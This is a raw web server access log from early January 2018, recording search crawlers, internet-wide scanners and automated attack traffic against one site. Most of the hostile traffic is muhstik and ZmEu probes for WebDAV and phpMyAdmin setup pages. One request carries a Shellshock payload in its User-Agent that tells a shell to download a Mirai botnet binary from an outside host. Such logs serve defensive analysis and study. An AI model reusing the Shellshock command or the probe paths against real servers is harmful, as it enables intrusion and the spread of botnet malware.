120.211.26.194 - - [02/Jan/2018:20:26:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
120.211.26.194 - - [02/Jan/2018:20:26:38 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
66.249.64.74 - - [02/Jan/2018:21:32:56 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.72 - - [02/Jan/2018:21:32:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
164.132.91.1 - - [02/Jan/2018:21:36:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "(KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
46.229.164.102 - - [02/Jan/2018:22:02:51 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)"
141.212.122.144 - - [02/Jan/2018:22:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.108.109 - - [02/Jan/2018:23:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
185.198.58.7 - - [02/Jan/2018:23:11:21 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
159.89.35.105 - - [02/Jan/2018:23:52:16 +0100] "HEAD / HTTP/1.1" 200 - "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
185.198.58.7 - - [03/Jan/2018:00:09:27 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
185.198.58.7 - - [03/Jan/2018:00:09:39 +0100] "GET //scripts/setup.php HTTP/1.1" 404 322 "-" "-"
66.249.64.150 - - [03/Jan/2018:00:18:36 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.150 - - [03/Jan/2018:00:18:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.138.71.76 - - [03/Jan/2018:00:32:34 +0100] "HEAD / HTTP/1.1" 200 - "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
141.212.122.144 - - [03/Jan/2018:00:48:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.198.58.7 - - [03/Jan/2018:01:11:08 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
185.198.58.7 - - [03/Jan/2018:01:11:17 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
77.75.79.62 - - [03/Jan/2018:01:13:20 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.62 - - [03/Jan/2018:01:13:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
172.104.108.109 - - [03/Jan/2018:01:16:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
209.126.136.4 - - [03/Jan/2018:01:16:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:01:28:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
167.114.209.28 - - [03/Jan/2018:01:51:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
167.114.209.28 - - [03/Jan/2018:01:51:34 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
167.114.209.28 - - [03/Jan/2018:01:51:35 +0100] "GET /sitemap.xml HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
167.114.209.28 - - [03/Jan/2018:01:51:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com;)"
167.114.209.28 - - [03/Jan/2018:01:51:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
185.198.58.7 - - [03/Jan/2018:02:09:24 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
185.198.58.7 - - [03/Jan/2018:02:09:24 +0100] "GET //scripts/setup.php HTTP/1.1" 404 322 "-" "-"
104.233.73.161 - - [03/Jan/2018:02:27:08 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:08 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:08 +0100] "GET /admin/scripts/setup.php HTTP/1.1" 404 328 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:09 +0100] "GET /db/scripts/setup.php HTTP/1.1" 404 325 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:09 +0100] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:09 +0100] "GET /mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:09 +0100] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:10 +0100] "GET /web/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:10 +0100] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:10 +0100] "GET /php/phpmyadmin/scripts/setup.php HTTP/1.1" 404 337 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:10 +0100] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:10 +0100] "GET /sqladmin/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:11 +0100] "GET /phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:11 +0100] "GET /admin/setup.php HTTP/1.1" 404 320 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:11 +0100] "GET /admin/mysql/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:11 +0100] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 339 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:12 +0100] "GET /admin/pma/scripts/setup.php HTTP/1.1" 404 332 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:12 +0100] "GET /admin/sql/scripts/setup.php HTTP/1.1" 404 332 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:12 +0100] "GET /blog/phpmyadmin/scripts/setup.php HTTP/1.1" 404 338 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:12 +0100] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:13 +0100] "GET /cpadmindb/scripts/setup.php HTTP/1.1" 404 332 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:13 +0100] "GET /cpanelmysql/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:13 +0100] "GET /cpanelphpmyadmin/scripts/setup.php HTTP/1.1" 404 339 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:13 +0100] "GET /database/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:13 +0100] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 335 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:14 +0100] "GET /web/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:14 +0100] "GET /web/phpmyadmin/scripts/setup.php HTTP/1.1" 404 337 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:14 +0100] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:14 +0100] "GET /webdb/scripts/setup.php HTTP/1.1" 404 328 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:15 +0100] "GET /websql/scripts/setup.php HTTP/1.1" 404 329 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:15 +0100] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 339 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:15 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:15 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:16 +0100] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 335 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:16 +0100] "GET /p/m/a/scripts/setup.php HTTP/1.1" 404 328 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:16 +0100] "GET /phpmanager/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:16 +0100] "GET /mysql-admin/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:17 +0100] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:17 +0100] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 331 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:17 +0100] "GET /phpmy-admin/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:17 +0100] "GET /php-myadmin/scripts/setup.php HTTP/1.1" 404 334 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:17 +0100] "GET /my/scripts/setup.php HTTP/1.1" 404 325 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:18 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:18 +0100] "GET /phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.1" 404 340 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:18 +0100] "GET /myAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:18 +0100] "GET /sqladm/scripts/setup.php HTTP/1.1" 404 329 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:19 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:19 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:19 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:19 +0100] "GET /setup.php HTTP/1.1" 404 314 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:20 +0100] "GET /phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:20 +0100] "GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1" 404 341 "-" "ZmEu"
104.233.73.161 - - [03/Jan/2018:02:27:20 +0100] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 342 "-" "ZmEu"
203.41.204.50 - - [03/Jan/2018:02:29:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
164.132.91.1 - - [03/Jan/2018:02:40:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101"
95.208.45.131 - - [03/Jan/2018:02:43:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
209.126.136.4 - - [03/Jan/2018:02:43:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
95.208.45.131 - - [03/Jan/2018:02:48:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
95.208.45.131 - - [03/Jan/2018:02:51:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
54.36.24.68 - - [03/Jan/2018:03:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Java/1.6.0_04"
209.126.136.4 - - [03/Jan/2018:03:47:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.56.229.65 - - [03/Jan/2018:04:00:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
78.46.128.227 - - [03/Jan/2018:04:06:09 +0100] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; SearchmetricsBot; http://www.searchmetrics.com/en/searchmetrics-bot/)"
78.46.128.227 - - [03/Jan/2018:04:06:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SearchmetricsBot; http://www.searchmetrics.com/en/searchmetrics-bot/)"
13.56.229.65 - - [03/Jan/2018:04:32:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:04:54:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:04:58:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
203.41.204.50 - - [03/Jan/2018:05:20:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
168.1.128.34 - - [03/Jan/2018:05:35:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
13.56.229.65 - - [03/Jan/2018:05:54:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
60.191.38.78 - - [03/Jan/2018:06:26:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:26:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:26:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:27:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:28:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
60.191.38.78 - - [03/Jan/2018:06:28:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
164.52.24.140 - - [03/Jan/2018:06:34:51 +0100] "\x16\x03\x01\x01\"\x01" 501 326 "-" "-"
164.52.24.140 - - [03/Jan/2018:06:34:59 +0100] "USER test +iw test :Test Wuz Here" 400 329 "-" "-"
164.52.24.140 - - [03/Jan/2018:06:35:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "muhstik/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
200.111.109.226 - - [03/Jan/2018:07:19:58 +0100] "GET /webdav HTTP/1.0" 404 307 "-" "muhstik-scan/1.0"
86.23.45.195 - - [03/Jan/2018:07:54:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
169.54.233.119 - - [03/Jan/2018:08:00:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0(WindowsNT6.1;rv:31.0)Gecko/20100101Firefox/31.0"
71.6.146.185 - - [03/Jan/2018:08:25:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.146.185 - - [03/Jan/2018:08:25:16 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
71.6.146.185 - - [03/Jan/2018:08:25:16 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
71.6.146.185 - - [03/Jan/2018:08:25:17 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.10.0"
172.104.108.109 - - [03/Jan/2018:09:03:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
66.249.79.8 - - [03/Jan/2018:09:07:16 +0100] "GET /support.html HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.212.122.144 - - [03/Jan/2018:09:08:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.249.79.132 - - [03/Jan/2018:09:23:37 +0100] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.130 - - [03/Jan/2018:09:23:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
183.90.60.51 - - [03/Jan/2018:09:36:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "() { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'"
98.143.148.135 - - [03/Jan/2018:10:06:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
139.162.114.70 - - [03/Jan/2018:10:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
139.162.119.197 - - [03/Jan/2018:10:18:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
141.212.122.144 - - [03/Jan/2018:10:19:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
209.126.136.4 - - [03/Jan/2018:10:20:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
139.162.108.53 - - [03/Jan/2018:10:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
209.126.136.4 - - [03/Jan/2018:11:01:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
217.64.114.176 - - [03/Jan/2018:11:04:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Java/1.6.0_04"
173.51.222.123 - - [03/Jan/2018:11:39:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
139.162.108.53 - - [03/Jan/2018:11:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
139.162.108.53 - - [03/Jan/2018:11:54:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
62.153.98.52 - - [03/Jan/2018:12:12:01 +0100] "GET / HTTP/1.1" 200 1229 "http://www.oberstufenzentrum.de/schulen/friedrich-list-schule-ehemals-osz-buerowirtschaft-ii" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
62.153.98.52 - - [03/Jan/2018:12:12:01 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
78.46.82.170 - - [03/Jan/2018:12:17:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
217.238.33.229 - - [03/Jan/2018:12:17:33 +0100] "GET / HTTP/1.1" 200 1229 "http://www.oberstufenzentrum.de/schulen/friedrich-list-schule" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
217.238.33.229 - - [03/Jan/2018:12:17:33 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "http://www.friedrich-list-berlin.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
91.64.50.189 - - [03/Jan/2018:12:22:57 +0100] "GET / HTTP/1.1" 200 1229 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
91.64.50.189 - - [03/Jan/2018:12:22:58 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
91.64.50.189 - - [03/Jan/2018:12:25:24 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
203.41.204.50 - - [03/Jan/2018:13:01:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
